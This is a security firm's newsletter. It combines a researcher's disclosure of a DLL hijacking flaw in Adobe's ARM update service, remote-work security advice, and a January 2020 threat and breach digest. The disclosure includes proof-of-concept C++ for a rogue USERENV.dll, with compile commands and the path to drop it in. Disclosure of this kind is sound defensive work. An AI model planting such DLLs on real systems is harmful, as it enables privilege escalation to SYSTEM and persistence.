Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.

Discovering a ‘Zero-Day’

 

As part of Shearwater’s Managed Security Operations Team, I regularly come across all kinds of exploitable vulnerabilities.

If neglected, these could allow hackers to breach an organisation’s defences, potentially causing irreparable damage.

In most cases, the vulnerabilities I come across are already well-known to security experts. Usually, patches exist to fix them.

However, discovering a new bug for the first time, one that isn’t known by software vendors, security researchers or the general public, is quite rare.

Such a vulnerability is known as a ‘Zero-Day’.

This is the story of how I recently discovered a ‘Zero-Day’ bug in the widely used Adobe Reader.

One day, while performing some vulnerability research, I noticed that the Adobe Update Service runs from a slightly unusual path (Common Files).

Huw’s Zero-Day Vulnerability

While not inherently dangerous, it drew my attention enough to look a little deeper into the service. The AdobeARMService is installed with Adobe Reader, runs as LocalSystem and has the task of keeping Adobe Reader up to date.

I checked the service and binary permissions and did not discover any misconfigurations. Next up, I had to work out how the service functioned. For that purpose, I installed Sysinternal’s Process Monitor, set it up to capture events and ran the armsvc.exe binary.

Huw’s Zero-Day Vulnerability

I noticed the program calls out to a DLL that does not exist, this suggested the possibility of a DLL Injection.

Windows has a defined search order for DLL files when invoked by a program. Interestingly this program was only looking in the local directory and C:\Windows\SysWOW64\, not the entire search path, suggesting it may be a hardcoded reference. If it was a hardcoded refence leftover from development, there is a good chance the program would not be checking that the DLL was signed. If that was the case, by placing a specially crafted DLL in that path, I would be able to execute arbitrary code.

To test my theory, I needed to discover what function the armsvc.exe was trying to load from the DLL. To that end I used the NSA’s reverse engineering tool Ghidra.

Huw’s Zero-Day Vulnerability

Reversing the binary, we can see that it tries to load the UnloadUserProfile function from USERENV.dll. With this knowledge, we can code our own DLL, create a function with that name and whatever code we want to include, export the function and have armsvc.exe load and execute it.

For a proof of concept, we can make the function pop open Calculator.

Proof Of Concept Code:
###############################USERENV.cpp
====================================================================
#include “windows.h”
BOOL APIENTRY DllMain(HMODULE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
)
{
       switch (ul_reason_for_call)
       {
       case DLL_PROCESS_ATTACH:
              WinExec(“calc”, SW_NORMAL);
       case DLL_THREAD_ATTACH:
       case DLL_THREAD_DETACH:
       case DLL_PROCESS_DETACH:
              break;
       }
       return TRUE;
}
extern “C” __declspec(dllexport) void UnloadUserProfile()
{
       WinExec(“calc”, SW_NORMAL);
}
====================================================================
Compile with
# i686-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL USERENV.cpp
# i686-w64-mingw32-g++ -shared -o USERENV.dll USERENV.o

 

Note that I compiled on Linux with mingw, the code may need to be tweaked for a Visual Studio compilation on Windows.

Copy USERENV.dll to C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\

Run C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe and observe Calculator being run proving arbitrary code execution.

Huw’s Zero-Day Vulnerability

 

A malicious actor could use this vulnerability for Privilege Escalation to SYSTEM, for Persistence and for Signed Execution, Whitelisting Bypass/Defence Evasion.

The root cause of this vulnerability was the non-existent DLL reference and not ensuring loaded DLLs are signed.

Thankfully, Adobe moved swiftly to release security updates to fix this ‘Zero-Day’ bug. Click here for further details and remediation solutions.

It’s a timely reminder to everyone to stay on top of software updates and make sure you regularly update patches to keep your systems secure.

Securing Remote Work

 

Remote working, teleworking, or telecommuting.

Whatever you call it – it is now the new normal.

In short, it is the ability of an organisation’s employees to perform work from locations other than the organisation’s facilities.

Whilst there are many aspects to securing your data and systems as staff work remotely, the three main considerations for every organisation are:

1) Securing Devices
2) Securing Remote Access
3) Securing Staff Practices

Securing Devices

Working from home requires organisational flexibility. Employees will require the use of a variety of devices to do their work, including desktop and laptop computers, smartphones or tablets. These may be supplied by the organisation, allowing easier control over device configurations and settings. Your IT team should maintain control over configurations and settings, ensuring devices are regularly updated and patched.

Increasingly, we see employees using their own personal devices, a practice known as BYOD.

This poses a particular set of challenges to ensure security provisions are adhered to. Your IT team will have limited control over these devices.

If staff must use a personal device, one option is to require the installation of Mobile Device Management (MDM) technology. This helps separate your organisation’s data from their personal information. You will also gain the ability to remotely manage your organisation’s data on the device. However, installing this on many different devices can present many logistical difficulties.

A better option for BYOD management is the use of cloud-based end-point protection tools. These allow you to manage the security and privacy controls on all the devices used by your staff for work, whether the devices are owned by your organisation or by the individual employees. Such systems usually have a single management dashboard where you can install software and run patches on all the devices, saving your IT team a lot of time. It also allows your company security policies to be managed across all devices on the network, including the setting-up of filters and managing settings as required.

The American National Institute of Standards and Technology, or NIST, provides a valuable framework for BYOD security. Covering both computers and mobile devices, it is a great starting point for any organisation concerned with how staff maybe using devices while they work remotely.

 

 8 Essential Tips for BYOD Security: Desktop or Laptop Computers

1 Use a combination of security software, such as antivirus software, personal firewalls, spam and web content filtering, and popup blocking, to stop most attacks, particularly malware;
2 Restrict who can use the PC by having a separate standard user account for each person, assigning a password to each user account, using the standard user accounts for daily use, and protecting user sessions from unauthorised physical access;
3 Ensure that updates are regularly applied to the operating system and primary applications, such as web browsers, email clients, instant messaging clients, and security software;
4 Disable unneeded networking features on the PC and configuring wireless networking securely;
5 Configure primary applications to filter content and stop other activity that is likely to be malicious;
6 Install and use only known and trusted software;
7 Configure remote access software based on the organization’s requirements and recommendations;
8 Maintain the PC’s security on an ongoing basis, such as changing passwords regularly and check the status of security software periodically.

Source: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf

 

8 Essential Tips for BYOD Security: Mobile Devices

1 Limit access to the device, such as setting a unique personal identification number (PIN) or password not used elsewhere, and automatically locking a device after an idle period;
2 Disable networking capabilities, such as Bluetooth and Near Field Communication (NFC), except when they are needed;
3 Ensure that security updates, if available, are acquired and installed at least weekly, preferably daily;
4 Configure applications to support security (e.g., blocking activity that is likely to be malicious);
5 Download and run apps only from authorized apps stores;
6 Do not jailbreak or root the device;
7 Do not connect the device to an unknown charging station;
8 Use an isolated, protected, and encrypted environment that is supported and managed by the organisation to access the organisation’s data and services.

Source: Source: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf

 

Following these NIST tips will allows organisations to limit the potential risks associated with the use of BYOD.

Whether your staff use devices supplied by the organisation or their own personal devices, make sure you have Full Disk Encryption implemented. This encrypts the entire hard drive of the device and applies to all files, data, software and operating systems. 

It is also essential that all devices and the systems they run use multi-factor authentication. By implementing multi-factor authentication on all systems, you significantly reduce the risk of attackers being able to breach your systems.

There are many aspects to securing devices as your staff work from home. Many organisations struggle to keep on top of this. However, the risks of failing to properly secure your devices can be very high.

Consider engaging an external Managed Security Services team. These cybersecurity professionals have the expertise to properly deploy, manage and monitor your end-points, including those inside and outside your network perimeter.

A team of experts will also be able to implement secure cloud-based web and email filtering, as well as provide remote SecOps support and advice to your in-house IT teams as they learn to cope with increased demands resulting from remote work practices.

Importantly, Managed Security Services teams can also provide scalable vulnerability management solutions to ensure bugs are routinely identified and patches applied. They can also be on hand in the event of a breach to provide comprehensive incident response solutions.

 

 

Securing Remote Access

It’s essential that remote employees retain the ability to perform their usual work-related tasks.

This will include communicating through a range of channels including email, as well as accessing corporate data and working on corporate files.

To facilitate all these activities, staff will need remote access to a range of systems and applications that are hosted on your organisation’s network. But finding a secure way for them to access your network isn’t always easy. Some of the most common ways include virtual private networks (VPNs), virtual desktops, or access to individual web applications (e.g., webmail).

Whichever you choose, you’re effectively expanding your organisation’s network into people’s homes. This elevates your risk profile to a new level.

You could face the risk of data theft. Your organisation’s corporate, financial, customer and staff data is highly valuable. Any breaches can result in massive losses and can irreparably undermine your organisation’s reputation.

However, data theft isn’t your only risk. If devices are not secured properly, your organisation’s other systems and networks face a range of threats that can cripple essential ICT infrastructure.

If, for example, one of your remote workers uses a device that becomes infected with a worm, this could spread through a virtual desktop to your organisation’s servers.

Meanwhile, VPNs facilitate employees accessing your organisation’s network from home. However, if the VPN isn’t properly secure, it can also provide an opening for attackers. It is essential to verify the identity of VPN tunnel end-points, as using the wrong authentication method could allow an attacker to compromise your corporate network.

Whether your organisation uses VPNs, virtual desktops, or web applications to allow staff to work remotely and access your network and systems, you need experienced Remote Access Penetration Testing more than ever before.

A team of highly experienced penetration testers can evaluate the security of all the components that facilitate remote access and can identify potential weaknesses that could compromise your network from the outside.

Remote Access Penetration Testing is a highly targeted process that interrogates the systems you use for remote access work. Using both unauthenticated and authenticated testing methodologies, we seek to identify any vulnerabilities an attacker may exploit.

With Remote Access Penetration Testing of the systems your staff use to connect into your organisation’s network, you can stay secure and maintain business continuity during this period of working from home.

 

 

Securing Staff Practices

If you don’t yet have a Remote Work Policy in place, you need to develop one.

With your staff working remotely, it’s essential that clear rules are in place to guide how they should work and the steps they need to take to keep the organisation’s data and systems secure.

Some of the cybersecurity-related elements your organisation should include in your Remote Work Policy are:

a) Physical Security

Emphasise the need to bear the physical security of their devices in mind. If staff are working outside their home, they should never leave a device unattended. If they step away from their device, the screen should always be locked. Other members of their household should not use a work device. Policies should make clear that staff will be held accountable for lost or stolen devices.

 

b) Data Security

Make sure staff are transferring corporate data securely. With staff likely to be using less-secure home wi-fi networks, they are more vulnerable to attack. Whilst the network in the corporate environment is likely have strong security provisions, home networks don’t usually have the same protections in place. All the investments your organisation has made in its security, from proxy filtering to network controls, can be redundant in a home environment. Whilst staff can take certain steps to enhance home wi-fi security, such as creating a separate SSID name for work activities, it is preferable that your policies make it clear that staff should use a VPN or a virtual desktop when accessing the network or transferring any corporate data.

An even better solution would be to ensure all the systems your staff need are hosted in the cloud, which they can access using multi-factor authentication.

Furthermore, implementing data loss prevention (DLP) tools, your staff will be blocked from sending sensitive information to an email address outside your company’s domain or to cloud storage services, such as Dropbox or Google Drive.

 

c) Device Security

Ensure your policies clearly state that staff are responsible for ensuring their devices are always updated and patched. This is clearly harder to verify when staff use their own devices. However, emphasising this within the policies will remind staff of their responsibilities for their devices when working remotely.

 

d) Email Security

Remind staff of the importance of phishing awareness. Human error is one of the largest enablers of cyber-attacks. Staff should be reminded of their obligation to carefully check both the sender and the contents of an email before clicking on any links or opening any attachments. Apart from the risks of malware, credential harvesting can be used to launch Business Email Compromise attacks, identity theft, or social engineering attacks.

Incorporating these considerations into your organisation’s Remote Work Policy will help provide guidance to your staff about how they should behave to keep your data, systems and network secure whilst working from home.

Developing effective and implementable Remote Work Policies can be challenging for organisations that have no experience in this area. By engaging cybersecurity specialists with expertise in policy development, you can ensure the policies your organisation adopts are suitable for your circumstances and cover all the essential elements to enhance your security posture.

 

How Shearwater Can Help

Shearwater’s range of cybersecurity solutions can meet every aspect of your organisation’s needs as you transition to remote working practices.

Whether you need Managed Security Services teams to protect your devices and network, assistance with Remote Work Policy development, or Remote Access Penetration Testing to identify vulnerabilities that need fixing – Shearwater has the capacity to assist.

Speak to one of our security consultants today for a no-obligation discussion about your organisation’s needs as you transition to remote work. 

 

 

Shearwater Security Report | January 2020

 

Each month Shearwater’s Managed Security Services Team brings you the latest Threats & Exploits, Breaches and Australian Cyber News to ensure you’re fully informed.

This month’s Security Report is essential reading so you can start the year on the right security footing:

• Current Threats and Exploits
• Recent Breaches
• Australian Cyber News

Current Threats and Exploits

❖ Start 2020 with these Top 20 Patches

Keeping up-to-date with patching is a challenge for any organisation.

Start the new year on the right foot when it comes to patching with this list of top 20 vulnerabilities that are currently being exploited by attack groups worldwide.

These 20 vulnerabilities have been ranked based on the number of times they have been exploited by sophisticated cyber-attack groups operating in the world today (from high to low).

Whilst some of these vulnerabilities are not new, it’s still important to make sure you’re protected. All too often attackers are able to exploit older vulnerabilities that people have inadvertently failed to patch.

No. CVE Products Affected by CVE CVSS Score (NVD) First-Last Seen (#Days)
1 CVE-2017-11882 Microsoft Office 7.8 713
2 CVE-2018-8174 Microsoft Windows 7.5 558
3 CVE-2017-0199 Microsoft Office, Windows 7.8 960
4 CVE-2018-4878 Adobe Flash Player, Red Hat Enterprise Linux 9.8 637
5 CVE-2017-10271 Oracle WebLogic Server 7.5 578
6 CVE-2019-0708 Microsoft Windows 9.8 175
7 CVE-2017-5638 Apache Struts 10 864
8 CVE-2017-5715 ARM, Intel 5.6 424
9 CVE-2017-8759 Microsoft .net Framework 7.8 671
10 CVE-2018-20250 RARLAB WinRAR 7.8 189
11 CVE-2018-7600 Debian, Drupal 9.8 557
12 CVE-2018-10561 DASAN Networks 9.8 385
13 CVE-2017-17215 Huawei 8.8 590
14 CVE-2012-0158 Microsoft N/A; 9.3 (according to cvedetails.com) 2690
15 CVE-2014-8361 D-Link, Realtek N/A; 10 (according to cvedetails.com) 1644
16 CVE-2017-8570 Microsoft Office 7.8 552
17 CVE-2018-0802 Microsoft Office 7.8 574
18 CVE-2017-0143 Microsoft SMB 8.1 959
19 CVE-2018-12130 Fedora 5.6 167
20 CVE-2019-2725 Oracle WebLogic Server 9.8 144
BONUS CVE-2019-3396 Atlassian Confluence 9.8 204

 

Recent Breaches

❖ Twitter for Android Patch

Twitter-for-Android-PatchTwitter has warned of a serious security vulnerability in its Android app that could have allowed an attacker to hijack an account, send tweets, access non-public account information, view private messages and location information. 

Twitter announced it recently fixed the bug in “version 7.93.4 (released Nov. 4, 2019 for KitKat) as well as version 8.18 (released Oct. 21, 2019 for Lollipop and newer).”

Twitter is urging users of its Android app to update to the latest version.

The bug didn’t affect its iOS app for iPhone users.

 


❖ Beware of Hornet’s Nest

Beware-of-Hornet’s-Nest“Hornet’s Nest” is a bundle of six types of malware including information-stealing trojans, a remote backdoor, a cryptojacker and a cryptocurrency stealer.

Whilst it’s unclear how the attack is initially delivered, it is believed to emanate from Russia and targets organisations around the world. Once delivered, it will execute PowerShell commands that enable it to begin its malicious activities.

The attack seems to be part of a cybercrime-as-a-service operation. Those who developed Hornet’s Nest apparently lease out their product to other cyber-criminals.

Attackers are able to steal vast swathes of personal data, all of which they could illicitly monetise either by committing fraud themselves, or by selling the information on to others on the dark web. It also includes a cryptocurrency stealer, allowing the attacker to raid the victim’s bitcoin wallet.

Such a multi-pronged attack can be a security nightmare for an organisation, considering all the kinds of data that could be compromised by the hackers.

However, if organisations are employing basic security measures, like applying patches and securing internet facing ports, they should go a long way to help the business avoid falling victim to this malware.

 


❖ Changes for G-Suite Users

Changes for G-Suite Users‘G-Suite’ is the name given to Google’s range of tools and apps, including Gmail, Google Calendar, Google Drive and Google Docs.

Until now, users of third-party email clients (such as Microsoft Outlook) could use their non-Google email username and password to access G-Suite products.

However, that’s about to change.

Vulnerabilities in some older third-party email clients, in which usernames and passwords were compromised, opened the way for attackers to access data from across the range of G-Suite products.

To stop this happening, Google will no longer allow users of less-secure-apps, or LSAs, from using their non-Google credentials with G-Suite products.

This change, which will commence in June 2020, won’t affect all non-Google email clients. Those that use OAuth, the authentication standard used by Google, Facebook, Microsoft, and Twitter, will continue to be able to access G-Suite products. 

 


❖ Ensure You Patch SharePoint Enterprise Servers

Ensure-You-Patch-SharePoint-Enterprise-ServersAttackers are actively scanning for enterprise servers running vulnerable Microsoft SharePoint versions that are easily exploitable with a single HTTP request to remotely run arbitrary code, security researchers warn.

A patch for the vulnerability was issued by Microsoft in February 2019 but some administrators have been slow to deploy the fix.

Researchers added support for the SharePoint vulnerability on a worldwide network of honeypots and observed multiple attacks very quickly. A significant number of enterprise SharePoint servers remain exposed to the vulnerability that is actively exploited in the wild. The seriousness of the flaw may have been underestimated as it requires no authentication on vulnerable systems and should have a high Common Vulnerabilities Scoring System (CVSS) rating of 9.8.

 


❖ WhatsApp Remote Code Execution Vulnerability

WhatsApp-Remote-Code-Execution-VulnerabilitySecurity researchers have uncovered yet another remote code execution vulnerability present in the popular instant messaging app WhatsApp.

The vulnerability is present in the library WhatsApp uses to display MP4 videos and can provide a remote malicious actor with code execution on the device in the context of the WhatsApp application.

Currently, all versions of WhatsApp for iOS and Android and even Windows Phones are known to be vulnerable. To exploit the vulnerability all a malicious actor needs to do is send a specially crafted MP4 message to their target and have them open it.

It is recommended that all users of WhatsApp update immediately. Updates can be found here.

 

 

Australian Cyber News

❖ Cybersecurity Improvements in Financial Sector

Cybersecurity-Improvements-in-Financial-SectorAccording to a new report by Australia’s corporate watchdog, ASIC, financial companies are improving their cybersecurity awareness and taking more steps to mitigate cyber risk.

In self-assessments against the National Institute of Standards in Technology (NIST) Cybersecurity Framework, the past year witnessed an average increase in cyber resilience of 15% across a range of functions.

Whilst ASIC said cyber resilience has improved, many financial companies have struggled to meet ambitious targets they set the previous year. A continually changing threat environment, limited organisational capability, and limited access to specialised skills and resources were also challenges.

 


❖ Online Safety – New Tougher Rules

Online-Safety-New-Tougher-RulesWith the community increasingly concerned about online bullying and other harmful online conduct, the Australian Government is proposing new rules that will compel digital platforms to remove inappropriate content within 24 hours following an instruction to do so from Australia’s eSafety Commissioner.

The removable content would not extend to online disputes of a personal nature, however they could include behaviour that is currently criminalised in the legal code.

Significantly, the proposals would extend current cyberbullying provisions from children to the entire population, although there would be a higher threshold for adults.

Search engines will be required to ‘de-rank offending content’, whilst digital platforms would have new transparency requirements.

The Department of Communications has published a discussion paper on the Act, with submission to close on 19 February 2020.

 


❖ Ransomware Still Rearing its Ugly Head

Ransomware-Still-Rearing-its-Ugly-HeadWith ransomware attacks continuing to rise, more organisations than ever are opting to pay cyber criminals in order to restore their networks.

A new report indicates the number of businesses agreeing to pay attackers has doubled in the past year. Malware that encrypts an organisation’s files can have devastating consequences for a business. Often, businesses conclude that the costs associated with paying the attackers will be less than the costs associated with down-time or lost data, despite law enforcement authorities recommending against giving into such extortion.

With attackers often demanding six-figure sums, and the chances of getting caught very low, it seems ransomware attacks are only going to continue to increase. Apart from the ransom money that needs to be paid, the cost of business down-time averages $208,000 in Australia.

The threat is particularly high in Australia and New Zealand, with local small-to-medium-sized enterprises (SMEs) experiencing the highest rate of ransomware attacks in the world according to new cybersecurity research.

There are some relatively simple steps you can take to help ensure your organisation remains secure:

  • Ensure all the systems and software on your network are up to date and patched with the latest security updates.
  • Make sure everyone in your organisation follows best practice password security protocols. Default passwords should not be used, and where possible, multi-factor authentication should be implemented.
  • Regularly backup all your files and ensure they are stored offline. In the event hackers block access to your systems and files, you will be able to restore operations relatively quickly if all your data is backed-up.

 


❖ Small Drop in Australian Online Fraud

Small Drop in Australian Online FraudFor only the second time, Australia saw a decline in online fraud during the 2018-2019 financial year.

Online fraud cost Australians $455 million, 5% lower than the previous year.

While the figure is heading in the right direction, it remains clear that much work needs to be done to significantly reduce instances of online fraud.

This drop comes on the back of efforts by the Reserve Bank, which continues to pressure the banking and payments industry to enhance online transaction security.

In response to the RBA, the payments industry designed a framework that sets out a tranche of compliance and security work that online merchants need to comply with, especially around how they keep card numbers and transactions secure from hackers.

Experts believe one of the biggest drivers of this drop in online fraud is the shift towards tap-and-pay technology, particularly the use of mobile handsets for payments, where consumer and bank security settings are far more robust thanks to regular software updates.

Card number tokenisation has also had a big impact in reducing online fraud, because it means the merchant doesn’t get the card number and it isn’t being input in the clear on the screen.

 

Sources
1. Start 2020 with these Top 20 Patches – cis.verint.com
2. Twitter for Android Patchwww.zdnet.com, www.itnews.com.au
3. Beware of Hornet’s Nest – www.zdnet.com
4. Changes for G-Suite Users – www.zdnet.com
5. Ensure You Patch SharePoint Enterprise Servers – www.itnews.com.au
6. WhatsApp Remote Code Execution Vulnerability – www.facebook.com
7. Cybersecurity Improvements in Financial Sector – www.zdnet.com
8. Online Safety – New Tougher Rules – www.zdnet.com
9. Ransomware Still Rearing its Ugly Headwww.zdnet.com, www.businessnewsaus.com.au
10. Small Drop in Australian Online Fraud – www.itnews.com.au

 

This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.